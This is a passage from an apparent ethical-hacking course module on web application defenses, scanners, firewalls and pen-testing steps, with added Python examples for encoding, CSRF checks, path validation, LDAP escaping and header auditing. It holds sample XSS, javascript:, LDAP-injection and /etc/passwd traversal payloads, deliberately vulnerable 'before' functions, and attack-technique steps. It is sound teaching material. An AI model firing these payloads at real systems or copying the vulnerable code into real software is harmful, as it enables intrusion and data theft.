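    """Encoding cannot neutralise a javascript: URL; the scheme must be allowlisted."""
    scheme = urlsplit(url).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def round_trips(text):
    """The HTML encoding is lossless: the browser displays the original characters."""
    return html.unescape(encode_for_html(text)) == text


def render_profile(display_name, home_url):
    """Build a fragment from untrusted values, encoding each for the context it lands in."""
    return (
        f"<p>Hello, {encode_for_html(display_name)}</p>\n"
        f'<a href="{encode_for_html(safe_url(home_url))}">home</a>\n'
        f'<script>var user = "{encode_for_js_string(display_name)}";</script>'
    )


if __name__ == "__main__":
    print(render_profile('<script>alert(1)</script>', "javascript:alert(1)"))
```

Encoding everything that is not alphanumeric is deliberately broader than the five-character minimum (&, <, >, ", '): it also covers characters that matter in contexts a developer may not have thought about, such as a backtick inside an attribute on older browsers, at the cost of slightly larger pages.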
How to Defend Against DoS Attacks
The following are the various measures that can be adopted to defend against DoS attacks:
- Perform thorough input validation.
- Secure remote administration and connectivity testing.
- Prevent the use of unnecessary functions such as gets and strcpy, and prevent return addresses from being overwritten.
- Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic.
- Prevent sensitive information from being overwritten.
- Data processed by the attacker should be stopped from being executed.
How to Defend Against Web Services Attacks
- Configure WSDL access control permissions to grant or deny access to any type of WSDL-based SOAP messages.
- Use document-centric authentication credentials that use SAML.
- Block external references and use pre-fetched content when de-referencing URLs.
- Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
- Maintain and update a secure repository of XML schemas.
Web Application Countermeasures
- Avoid using redirects and forwards; if destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.
Cross-Site Request Forgery
- Log off immediately after using a web application and clear the history.
- Do not allow your browser and websites to save login details.
- Check the HTTP Referer header, and when processing a POST, ignore URL parameters.
- Use SSL for all authenticated parts of the application.
- Verify that all users' identities and credentials are stored in a hashed form.
- Never submit session data as part of a GET or POST.
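The server-side items in the list (Referer check, URL parameters ignored on POST, no session data in parameters) fit in one request-validation function. The code below is an added example, not part of the original module, and it goes one step beyond the list by also requiring an anti-CSRF token in the POST body, compared in constant time; the Origin header is consulted first and Referer used as the fallback, since modern browsers send Origin on cross-site POSTs more reliably. The request objects are plain dicts standing in for a framework's request, and the host app.example.com, the token value and the request contents are constructed.

```python
import hmac
from urllib.parse import urlsplit

SITE_HOST = "app.example.com"  # assumed hostname of the protected application


def check_state_changing_request(request, expected_token):
    """Return the reasons a state-changing request must be refused (empty list = accept).

    request stands in for a framework request object:
    {"method": str, "headers": {...}, "query": {...}, "form": {...}}.
    """
    reasons = []
    if request["method"].upper() != "POST":
        reasons.append("state change must use POST")

    # Origin is checked first; Referer is the fallback the countermeasure describes.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not source:
        reasons.append("missing Origin/Referer")
    elif urlsplit(source).hostname != SITE_HOST:
        reasons.append(f"cross-site source {source}")

    # Session data belongs in the cookie, never in GET or POST parameters.
    if "session" in request["query"] or "session" in request["form"]:
        reasons.append("session data in parameters")

    # On a POST only the body is consulted: a token smuggled into the URL is ignored.
    token = request["form"].get("csrf_token")
    if token is None or not hmac.compare_digest(token, expected_token):
        reasons.append("bad csrf token")
    return reasons


# Constructed requests for demonstration.
LEGIT = {
    "method": "POST",
    "headers": {"Origin": "https://app.example.com"},
    "query": {},
    "form": {"csrf_token": "T1", "amount": "100"},
}
FORGED = {
    "method": "POST",
    "headers": {"Referer": "https://evil.example/page"},
    "query": {"csrf_token": "T1"},
    "form": {"amount": "100"},
}

if __name__ == "__main__":
    print("legit :", check_state_changing_request(LEGIT, "T1"))
    print("forged:", check_state_changing_request(FORGED, "T1"))
```

A request with neither Origin nor Referer is refused here. Some privacy tools strip both headers, so a strict deployment loses those users on state-changing actions; the token check is what makes the header check a second opinion rather than the only line of defense.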
- Implement cookie timeouts.
Web Application Countermeasures (Cont'd)
- Non-SSL requests to web pages should be redirected to the SSL page.
- Configure the SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.
Directory Traversal
- Validate user input, taking into account alternate encodings such as Unicode that could be used to effect a directory traversal.
- Web servers should be updated with security patches in a timely manner.
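The "alternate encodings" point is where most traversal filters fail: a check for "../" on the raw value misses ..%2F, the double-encoded %252e%252e, the %u002e form, backslashes, and fullwidth Unicode dots. The function below is an added example, not code from the original module: it decodes the path until it stops changing, folds Unicode compatibility forms with NFKC, rejects NUL bytes, and then resolves the result under a fixed root and checks that it is still inside. The root /var/www/app/files and the sample paths are constructed; posixpath is used so the check is purely lexical and runs the same on any OS.

```python
import posixpath
import re
import unicodedata
import urllib.parse

WEB_ROOT = "/var/www/app/files"  # assumed document root for user-downloadable files
_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def fully_decode(value, max_rounds=5):
    """Undo nested %XX / %uXXXX encodings so that %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = urllib.parse.unquote(decoded)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("path still decoding after %d rounds" % max_rounds)


def resolve_user_path(user_path):
    """Map an untrusted relative path onto WEB_ROOT, refusing anything that escapes it."""
    text = fully_decode(user_path)
    text = unicodedata.normalize("NFKC", text)  # fullwidth '．' and '／' fold to ASCII
    if "\x00" in text:
        raise ValueError("NUL byte in path")
    text = text.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, text))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise ValueError(f"path escapes web root: {user_path!r}")
    return candidate


if __name__ == "__main__":
    for sample in (
        "reports/q3.pdf",
        "..%2F..%2Fetc%2Fpasswd",
        "%252e%252e/%252e%252e/etc/passwd",
        "\uff0e\uff0e/\uff0e\uff0e/etc/passwd",
    ):
        try:
            print(f"{sample!r:45} -> {resolve_user_path(sample)}")
        except ValueError as err:
            print(f"{sample!r:45} -> rejected: {err}")
```

Note what the function does not do: it never strips "../" from the input. A filter that removes "../" once turns "....//" into "../" and is worse than no filter; resolving the whole path and comparing prefixes has no such failure mode. On a real filesystem the final step should use os.path.realpath on the candidate so that a symbolic link inside the root cannot point back out of it.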
Security Misconfiguration
- Configure all security mechanisms and turn off all unused services.
- Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords.
- Scan for the latest security vulnerabilities and apply the latest security patches.
LDAP Injection Attacks
- Perform type, pattern, and domain value validation on all input data.
- Make LDAP filters as specific as possible.
- Validate and restrict the amount of data returned to the user.
- Implement tight access control on the data in the LDAP directory.
- Perform dynamic testing and source code analysis.
File Injection Attack
- Strongly validate user input.
- Consider implementing a chroot jail.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
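The LDAP items above translate into two small pieces of code: pattern validation for values that have a known shape (a login name), and RFC 4515 filter escaping for values that do not (a display name). The script below is an added example, not part of the original module. It shows the filter an attacker gets from raw concatenation, then the validated and escaped forms; the objectClass term and the attribute names are the ones from inetOrgPerson, and the input values are constructed.

```python
import re

# RFC 4515: these five characters must be escaped inside a filter assertion value.
_LDAP_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Type, pattern and length for a login name, checked before the value is used at all.
UID_RE = re.compile(r"[a-z][a-z0-9._-]{0,31}")


def escape_ldap_filter_value(value):
    """RFC 4515 escaping for a value embedded in a search filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def user_filter_vulnerable(uid, password):
    """Deliberately broken: raw concatenation lets the input rewrite the filter."""
    return f"(&(uid={uid})(userPassword={password}))"


def user_lookup_filter(uid):
    """Validate the uid against its expected pattern and keep the filter specific:
    objectClass pinned, one attribute, no password comparison in the filter."""
    if not UID_RE.fullmatch(uid):
        raise ValueError(f"uid does not match the expected pattern: {uid!r}")
    return f"(&(objectClass=inetOrgPerson)(uid={escape_ldap_filter_value(uid)}))"


def name_lookup_filter(display_name):
    """A free-form value has no pattern to validate against, so escaping carries the load."""
    return f"(&(objectClass=inetOrgPerson)(cn={escape_ldap_filter_value(display_name)}))"


if __name__ == "__main__":
    injection = "*)(uid=*))(|(uid=*"
    print("vulnerable:", user_filter_vulnerable(injection, "x"))
    print("escaped   :", name_lookup_filter(injection))
    print("validated :", user_lookup_filter("jason"))
```

The password is deliberately absent from the safe filter: the directory should verify it by binding as the DN the lookup returned, not by comparing userPassword in a search. The search itself should carry a size limit of one result, which is the "restrict the amount of data returned" item, and the bind account used for the lookup should have read access to uid and cn only.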
How to Defend Against Web Application Attacks
To defend against web application attacks, follow the countermeasures stated previously. To protect the web server, deploy a web application firewall (WAF) or IDS and filter packets. Constantly update the software with patches to keep the server up to date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications. Use stored procedures and parameterized queries to retrieve data, and disable verbose error messages, which can give the attacker useful information; use custom error pages instead. To limit the impact of SQL injection into the database, connect using a non-privileged account and grant the least privileges needed on the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
Module Flow
Now we will discuss web application security tools. Web application security tools help you to detect possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked; tools and countermeasures together offer more protection than either alone.
Web Application Security Tool: Acunetix Web Vulnerability Scanner
http://www.acunetix.com
Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications. (The screenshot shows a finished scan of a test target with alerts grouped by severity: High, Medium, Low and Informational, including Cross-site scripting (verified), SQL injection, HTTP PUT enabled, OPTIONS method enabled, and login page findings.)
Web Application Security Tool: Watcher Web Security Tool
http://www.casaba.com
Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it is safe for production use. It detects web-application security issues and operational configuration issues. (The screenshot lists Watcher's checks, including: Cache-Control header settings; presence of a Content-Type header in the HTTP response; IE8's XSS protection filter not having been disabled by the web application; the X-Content-Type-Options defense against MIME sniffing being declared; the X-Frame-Options header being set against clickjacking; common database error messages; dubious comments that warrant further attention; and sensitive information passed through URL parameters (OWASP ASVS).)
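The checks Watcher lists are simple to reproduce, which is useful when you want the same passive audit inside a proxy script or a CI job. The script below is an added example, not code from Watcher or the original module: it parses a raw HTTP response, applies the header, body and URL checks from the screenshot, and returns the findings as a list. Both responses and the URLs are constructed; the header names checked are the real ones.

```python
import re
from urllib.parse import parse_qs, urlsplit

DB_ERROR_RE = re.compile(r"(?i)(SQL syntax|ODBC|ORA-\d{5}|SQLSTATE|mysql_fetch|unclosed quotation)")
DUBIOUS_COMMENT_RE = re.compile(r"(?is)<!--.*?(todo|fixme|debug|password|hack).*?-->")
SENSITIVE_PARAM_RE = re.compile(r"(?i)(pass|pwd|token|session|ssn|secret)")


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status_code, headers, body); names lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def audit(url, raw_response):
    """Passive checks over one request URL and its response; returns a list of findings."""
    status, headers, body = parse_response(raw_response)
    findings = []
    if status >= 500:
        findings.append("server error page (5xx)")
    if "content-type" not in headers:
        findings.append("missing Content-Type header")
    if headers.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff (MIME sniffing)")
    if "x-frame-options" not in headers:
        findings.append("missing X-Frame-Options (clickjacking)")
    if headers.get("x-xss-protection", "").startswith("0"):
        findings.append("X-XSS-Protection disabled by the application")
    if "no-store" not in headers.get("cache-control", "").lower():
        findings.append("Cache-Control lacks no-store")
    if DB_ERROR_RE.search(body):
        findings.append("database error message in response body")
    if DUBIOUS_COMMENT_RE.search(body):
        findings.append("dubious HTML comment warrants review")
    for name in parse_qs(urlsplit(url).query):
        if SENSITIVE_PARAM_RE.search(name):
            findings.append(f"sensitive parameter in URL: {name}")
    return findings


# Constructed responses for demonstration (not captured traffic).
BAD_URL = "https://app.example.com/login?user=jason&password=s3cret"
BAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.3\r\n"
    "X-XSS-Protection: 0\r\n"
    "Cache-Control: public\r\n"
    "\r\n"
    "<html><!-- TODO remove debug password dump --><p>You have an error in your SQL syntax"
    " near '' at line 1</p></html>"
)
GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: DENY\r\n"
    "Cache-Control: no-store\r\n"
    "\r\n"
    "<html><p>Welcome</p></html>"
)

if __name__ == "__main__":
    for finding in audit(BAD_URL, BAD_RESPONSE):
        print("-", finding)
```

The Cache-Control rule is only right for authenticated or otherwise sensitive pages; run as written over a whole site it flags every static asset, which is why Watcher scopes that check by URL pattern.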
(The screenshot shows an N-Stalker scan report for a reflected Cross-site Scripting finding, with the URL, parameter name, parameter type, attack pattern, classification, and vulnerability details.)
Web Application Security Tool: N-Stalker Web Application Security Scanner
http://nstalker.com
Web Application Security Tool: VampireScan
http://www.vampiretech.com
Features:
- Protect your website from hackers
- Scan and protect your infrastructure and web applications from cyber-threats
- Give you direct, actionable insight on high, medium, and low risk vulnerabilities
Web Application Security Tools
Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS, and other vulnerabilities. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:
- Sandcat Mini available at http://www.syhunt.com
- Websecurify available at http://www.websecurify.com
- OWASP ZAP available at http://www.owasp.org
- NetBrute available at http://www.rawlogic.com
- WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com
- SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
- SPIKE Proxy available at http://www.immunitysec.com
- Ratproxy available at http://code.google.com
- skipfish available at http://code.google.com
- x5s available at http://www.casaba.com
In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:
- Wapiti available at http://wapiti.sourceforge.net
- Syhunt Hybrid available at http://www.syhunt.com
- WebWatchBot available at http://www.exclamationsoft.com
- Exploit-Me available at http://labs.securitycompass.com
- KeepNI available at http://www.keepni.com
- WSDigger available at http://www.mcafee.com
- Grabber available at http://rgaucher.info
- Arachni available at http://arachni-scanner.com
- xsss available at http://www.sven.de
- Vega available at http://www.subgraph.com
Web Application Firewall: dotDefender
http://www.applicure.com
dotDefender™ is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior and detects and blocks SQL injection attempts. (The screenshot shows the dotDefender console's SQL Injection pattern set, including Suspect Single Quote, Classic SQL Comment, SQL Comments, 'Select Version' Statement, and SQL CHAR Type, alongside the Whitelist, Parameters, Encoding, Buffer Overflow and Remote Command Execution categories.)
Web Application Firewall: ServerDefender VP
http://www.port80software.com
The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions. (The screenshot shows the SQL Injection and Cross-Site Scripting (XSS) rule pages, with generic input sanitization selectable as None, Minimum, Extended, or Paranoid.)
- QualysGuard WAF available at http://www.qualys.com
- IBM Security AppScan available at http://www-01.ibm.com
- ThreatRadar available at http://www.imperva.com
- Trustwave WebDefend available at https://www.trustwave.com
Module Flow
As mentioned previously, web applications are highly exposed to attack. Attackers use compromised web applications as a base for spreading further attacks, turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.
Web Application Pen Testing
Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation flaws, buffer overflows, SQL injection, authentication bypass, code execution, etc. in a given application.
Web application pen testing helps in:
- Identification of Ports
- Verification of Vulnerabilities: exploiting the vulnerability in order to test and fix the issue.
- Remediation of Vulnerabilities
Web Application Pen Testing (Cont'd)
(The slide shows the testing steps as a flowchart beginning at START.)
Step 1: Defining objective
You should define the aim of the penetration test before conducting it. This helps you move in the right direction towards the aim of the penetration test.
Step 2: Information gathering
Step 3: Configuration management testing
Step 4: Authentication and session management testing
I n f o r m a t io n G a t h e r in g C E H
I n f o r m a tio n G a th e r in g
S t e p 1: A n a l y z e t h e r o b o t s . t x t f i l e
R o b o t . t x t is a f i l e t h a t i n s t r u c t s w e b r o b o t s a b o u t t h e w e b s i t e s u c h a s d i r e c t o r i e s t h a t c a n b e
allow ed a n d disallow ed to th e user. H ence, analyze th e ro b o t.tx t an d d e te r m in e th e allow ed
a n d d i s a l l o w e d d i r e c t o r i e s o f a w e b a p p l i c a t i o n . Y ou c a n r e t r i e v e a n d a n a l y z e r o b o t s . t x t file
using tools such as GNU W get.
S t e p 2: P e r f o r m s e a r c h e n g i n e r e c o n n a i s s a n c e
Use th e advanced "site:" s e a r c h operator and then click C a c h e d t o perform search engine
r e c o n n a i s s a n c e . It g i v e s y o u i n f o r m a t i o n s u c h a s i s s u e s o f w e b a p p l i c a t i o n s t r u c t u r e a n d e r r o r
pages produced.
Information Gathering (Cont'd)
Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilizing alternate request methods (POST/PUT/other) in order to collect confidential information from the server. This may reveal information such as software versions, database details, bugs, and technological components.
Step 7: Test for recognized file types/extensions/directories
Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and observe the response. This may give you an idea about the web application environment.
Step 8: Examine source of available pages
Step 9: TCP/ICMP and service fingerprinting
Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about web application services and associated ports.
Configuration Management Testing
- Source code, installation paths, passwords for applications, and databases
- Verify the presence of old, backup, and unreferenced files
- Test for infrastructure and application admin interfaces
- Admin interfaces can be found to gain access to admin functionality
Once you gather information about the web application environment, test the configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.
Step 1: Perform SSL/TLS testing
SSL/TLS testing allows you to identify the ports associated with SSL/TLS-wrapped services. You can do this with the help of tools such as Nmap and Nessus. This helps disclose confidential information.
Step 2: Perform infrastructure configuration management testing
Step 3: Perform application configuration management testing
Authentication Testing
- Test for race conditions: attempt to force a race condition; make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review. (Information gained: race conditions)
Step 1: Test for vulnerable "remember password" and password reset
Test for a vulnerable "remember password" feature and password reset by attempting to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check whether a "remember my password" mechanism is implemented by inspecting the HTML code of the login page; through this mechanism, an authentication weakness can be uncovered.
Step 2: Test for logout and browser cache management
Step 3: Test for CAPTCHA
Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server, and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you to determine authentication vulnerabilities.
Session Management Testing
Step 1: Test for session management schema
Step 2: Test for cookie attributes
Step 3: Test for session fixation
Authorization Testing
- Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application (information gained: access to reserved information)
- Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role
Authorization Testing
Follow the steps here to test the web application against authorization vulnerabilities:
Step 1: Test for path traversal
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.
Step 2: Test for bypassing authorization schema
Step 3: Test for privilege escalation
Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.
Data Validation Testing
- Test for reflected cross-site scripting: detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report and attempt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
- Test for stored cross-site scripting: analyze HTML code, test for stored XSS, leverage stored XSS, verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant
- Test for DOM-based cross-site scripting: perform source code analysis to identify JavaScript coding errors
- Test for cross site flashing: analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and Debugger Version of Flash Plugin/Player
- Test for SQL injection: perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQLPower Injector, etc.
- Test for LDAP injection: use a trial and error approach by inserting '(', '|', and the other characters in order to check the application for errors. Use the tool Softerra LDAP Browser
Information gained by these tests: session cookie information, sensitive information such as session authorization tokens, cookie information, information on DOM-based cross-site scripting vulnerabilities, and sensitive information about users and hosts.
Step 1: Test for reflected cross-site scripting
In a reflected cross-site scripting attack, the attacker crafts a URL that exploits the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks the link, believing it comes from a trusted server, the malicious script the attacker embedded in the URL executes in the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the victim's sensitive information. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can easily determine whether the URL originally came from the server or was crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
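The reflected XSS check described above, as an added example that is not part of the CEH module: a minimal handler that echoes a query parameter, shown first as the vulnerable version and then with the output encoding that defends against reflection, plus a check a tester can run against either. The handler names and the probe string are assumptions made for the example; nothing is sent over the network.

```python
# Added example (not from the CEH module): a minimal handler that reflects a
# query parameter, shown as the vulnerable "before" and the output-encoded
# "after", plus the reflection check a tester runs against either. Everything
# is in-process; the handler names and the probe string are assumptions.
import html
from urllib.parse import parse_qs, quote

def render_search_unsafe(query_string):
    """Before: the 'q' parameter is copied into the HTML verbatim."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for: {q}</h1>"

def render_search_safe(query_string):
    """After: HTML-encode untrusted data before it lands in element content."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"

# A harmless marker carrying the characters that matter in an HTML context
# (<, >, ', ") without forming any tag or script, so it is safe to submit.
PROBE = "xsschk<'\">"

def reflects_unencoded(handler, param="q"):
    """True if the handler echoes the probe with its metacharacters intact.

    With correct output encoding the probe comes back as
    xsschk&lt;&#x27;&quot;&gt; and the check reports no unencoded reflection.
    """
    body = handler(f"{param}={quote(PROBE, safe='')}")
    return PROBE in body
```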
- Perform ORM injection testing: discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails (information gained: information on SQL injection vulnerability)
- Perform XML injection testing: try to insert XML metacharacters (information gained: information about XML structure)
- Perform SSI injection testing: find if the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, OWASP ZAP, WebScarab, String searcher: grep (information gained: web server CGI environment variables)
- Perform XPath injection testing: inject XPath code and interfere with the query result
- Perform IMAP/SMTP injection testing: identify vulnerable parameters, understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection (information gained: access to confidential information)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Step 8: Perform XML injection testing
To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about the XML structure.
Step 9: Perform SSI injection testing
Perform SSI injection testing and find if the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, Paros, WebScarab, String searcher: grep. If the attacker can inject SSI implementations, then he or she can set or print web server CGI environment variables.
Step 10: Perform XPath injection testing
Step 13: Perform OS commanding
Perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks. OS commanding may reveal local data and system information.
Step 14: Perform buffer overflow testing
Step 15: Perform incubated vulnerability testing
Upload a file that exploits a component in the local user workstation when viewed or downloaded by the user, and perform XSS and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.
Step 1: Test for SQL wildcard attacks
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server
Denial-of-Service Testing (Cont'd)
Test for user input as a loop counter by entering an extremely large number in an input field that the application uses as a loop counter. If the application fails to behave in its predefined manner, it means that the application contains a logical error.
Use a script to automatically submit an extremely long value to the server in a request that is being logged.
Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.
Step 8: Test for storing too much data in session
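The three denial-of-service conditions just described (user input driving a loop, oversized values written to a log, too much data stored in the session), as an added example that is not part of the CEH module: a handler that trusts its input beside a hardened one that bounds all three. The handler names and the limit values are assumptions chosen for the example.

```python
# Added example (not from the CEH module): a request handler that trusts
# user input as a loop counter, log content and session payload, beside a
# hardened version that bounds all three. Limits and names are assumptions.
MAX_PAGE_SIZE = 100        # largest value a user may supply as a loop counter
MAX_LOGGED_LEN = 256       # characters of user input copied into a log line
MAX_SESSION_BYTES = 4096   # user-supplied bytes kept in one session

class InputError(ValueError):
    """Raised when user input falls outside the bounds the application defines."""

def list_items_vulnerable(page_size, note, log, session):
    """Before: the loop runs page_size times; the note is logged and stored as-is."""
    log.append(f"request page_size={page_size} note={note}")
    session["note"] = note
    return [f"item-{i}" for i in range(int(page_size))]

def session_bytes(session):
    """Bytes of user data held in a session dictionary (values as UTF-8)."""
    return sum(len(str(v).encode("utf-8")) for v in session.values())

def list_items_hardened(page_size, note, log, session):
    """After: validate the counter, cap what is logged, cap what the session stores."""
    try:
        n = int(page_size)
    except (TypeError, ValueError):
        raise InputError("page_size must be an integer") from None
    if not 1 <= n <= MAX_PAGE_SIZE:
        raise InputError(f"page_size must be between 1 and {MAX_PAGE_SIZE}")
    # measure the session as it would look after storing the note
    if session_bytes({**session, "note": note}) > MAX_SESSION_BYTES:
        raise InputError("session data limit exceeded")
    # truncate for the log: log growth must not scale with attacker-chosen input
    log.append(f"request page_size={n} note={note[:MAX_LOGGED_LEN]!r}")
    session["note"] = note
    return [f"item-{i}" for i in range(n)]

def hardened_rejects(page_size=1, note="", session=None):
    """True if the hardened handler refuses the input (helper for the checks)."""
    try:
        list_items_hardened(page_size, note, [], {} if session is None else session)
        return False
    except InputError:
        return True
```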
Web Services Testing
- To gather WS information use tools such as wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods
- Use tools such as WSDigger, WebScarab, and Foundstone to automate web services security testing
- Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing
- Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if the XML document has a SOAP attachment vulnerability
Information gained: information about SQL, XPath, buffer overflow, and command injection vulnerabilities; information about MITM vulnerability; HTTP GET/REST attack vectors; SOAP message information.
AJAX Testing (slide): Test for AJAX (information gained: AJAX application call endpoints); Parse the HTML and JavaScript files (information gained: XMLHttpRequest object, JavaScript files, AJAX frameworks); Use a proxy to observe traffic (information gained: format of application requests).
AJAX Testing
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
Module Summary
- With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations
- It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices
Module Summary